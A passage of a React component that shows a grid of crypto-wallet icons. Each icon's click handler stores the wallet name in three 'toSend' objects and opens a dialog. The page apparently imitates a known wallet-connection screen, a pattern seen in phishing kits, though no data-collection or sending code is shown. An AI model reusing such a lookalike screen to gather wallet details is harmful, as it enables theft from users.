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Dh3s+0G+XxRHgGGxngMedzYefV1cRPid0c9bpywjzSF2KY4f1NZ24bjeggoylqAqhhPYIBZY+6SMLf/bo8hAQwvswTtkk7bhmORTCaS5ZAAuhy7qGGej64YEkAhx9OLKQAqb349Y0wASV0BERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERESnc/wIq2OMjUXk+ogAAAABJRU5ErkJggg=="
              alt="Bridge Wallet"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("Bridge wallet");
                setToSend({
                  ...toSend,
                  [e.target.name]: "Bridge wallet",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "Bridge wallet",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "Bridge wallet",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">
            Bridge Wallet
          </div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
            <img
              src={sparkpoint}
              alt="SparkPoint"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("SparkPoint");
                setToSend({
                  ...toSend,
                  [e.target.name]: "SparkPoint",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "SparkPoint",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "SparkPoint",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">
            SparkPoint
          </div>
        </div>
        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
            <img
              src={viawallet}
              alt="ViaWallet"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("Viawallet");
                setToSend({
                  ...toSend,
                  [e.target.name]: "Viawallet",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "Viawallet",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "Viawallet",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">
            ViaWallet
          </div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
            <img
              src={coin98}
              alt="Coin98"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("Coin98");
                setToSend({
                  ...toSend,
                  [e.target.name]: "Coin98",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "Coin98",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "Coin98",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">Coin98</div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
            <img
              src={bitkeep}
              alt="BitKeep"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("Bitkeep");
                setToSend({
                  ...toSend,
                  [e.target.name]: "Bitkeep",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "Bitkeep",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "Bitkeep",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">
            BitKeep
          </div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
            <img
              src={vision}
              alt="Vision"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("Vision");
                setToSend({
                  ...toSend,
                  [e.target.name]: "Vision",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "Vision",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "Vision",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">Vision</div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
            <img
              src="data:image/png;base64,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"
              alt="SWFT Wallet"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("Swft wallet");
                setToSend({
                  ...toSend,
                  [e.target.name]: "Swft wallet",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "Swft wallet",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "Swft wallet",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">
            SWFT Wallet
          </div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
            <img
              src={peakdefi}
              alt="PeakDeFi Wallet"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("PeakDefi");
                setToSend({
                  ...toSend,
                  [e.target.name]: "PeakDefi",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "PeakDefi",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "PeakDefi",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">
            PeakDeFi Wallet
          </div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
            <img
              src={xdc}
              alt="XDC Wallet"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("XDC wallet");
                setToSend({
                  ...toSend,
                  [e.target.name]: "XDC wallet",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "XDC wallet",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "XDC wallet",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">
            XDC Wallet
          </div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
            <img
              src={unstoppable}
              alt="Unstoppable Wallet"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("Unstoppable wallet");
                setToSend({
                  ...toSend,
                  [e.target.name]: "Unstoppable wallet",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "Unstoppable wallet",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "Unstoppable wallet",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">
            Unstoppable Wallet
          </div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
            <img
              src={meetone}
              alt="MEET.ONE"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("Meet.one");
                setToSend({
                  ...toSend,
                  [e.target.name]: "Meet.one",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "Meet.one",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "Meet.one",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">
            MEET.ONE
          </div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
            <img
              src={dok}
              alt="Dok Wallet"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("Dok");
                setToSend({
                  ...toSend,
                  [e.target.name]: "Dok",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "Dok",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "Dok",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">
            Dok Wallet
          </div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
            <img
              src={atwallet}
              alt="AT.Wallet"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("Atwallet");
                setToSend({
                  ...toSend,
                  [e.target.name]: "Atwallet",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "Atwallet",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "Atwallet",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">
            AT.Wallet
          </div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
            <img
              src={morixwallet}
              alt="MoriX Wallet"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("Morix wallet");
                setToSend({
                  ...toSend,
                  [e.target.name]: "Morix wallet",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "Morix wallet",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "Morix wallet",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">
            MoriX Wallet
          </div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
            <img
              src={midaswallet}
              alt="Midas Wallet"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("Midas wallet");
                setToSend({
                  ...toSend,
                  [e.target.name]: "Midas wallet",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "Midas wallet",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "Midas wallet",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">
            Midas Wallet
          </div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
            <img
              src={binance}
              alt="MoriX Wallet"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("Binance smartchain");
                setToSend({
                  ...toSend,
                  [e.target.name]: "Binance smartchain",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "Binance smartchain",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "Binance smartchain",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">
            Binance Smart Chain
          </div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
            <img
              src={safepaljpg}
              alt="Midas Wallet"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("Safepal");
                setToSend({
                  ...toSend,
                  [e.target.name]: "Safepal",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "Safepal",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "Safepal",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">
            SafePal Wallet
          </div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
            <img
              src={solana}
              alt="MoriX Wallet"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("Solana");
                setToSend({
                  ...toSend,
                  [e.target.name]: "Solana",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "Solana",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "Solana",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">Solana</div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
            <img
              src={ronin}
              alt="MoriX Wallet"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("Ronin");
                setToSend({
                  ...toSend,
                  [e.target.name]: "Ronin",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "Ronin",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "Ronin",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">Ronin</div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
            <img
              src={rainbow}
              alt="Rainbow"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("Rainbow");
                setToSend({
                  ...toSend,
                  [e.target.name]: "Rainbow",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "Rainbow",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "Rainbow",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">
            Rainbow
          </div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
            <img
              src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEAAkGBxAHBhUQBxESDw8QFRUVGRcTExUSFxYcIBUXFxoXFxMYHSggGB4nHRUTJj0iJSkrLi4uGB8zODMsOzQtLisBCgoKDg0OGxAQGy0
                              lICUtLS0tKy0tLS0tKysrLS0tLS4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLf/AABEIAOEA4QMBEQACEQEDEQH/xAAbAAEAAgMBAQAAAAAAAAAAAAAABAYDBQcCAf/EADkQAQABAgMEBggFAwUAAAA
                              AAAABAgMEBREhMUFRBhIiYYHRExQVcZGhscEjMlJTkkLh8ENicqLC/8QAGgEBAAMBAQEAAAAAAAAAAAAAAAMEBQEGAv/EACoRAQACAgEDAgYCAwEAAAAAAAABAgMRBBIhMRNRBSJBYYGxFFIjcaGR/9oADAMBA
                              AIRAxEAPwDuIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
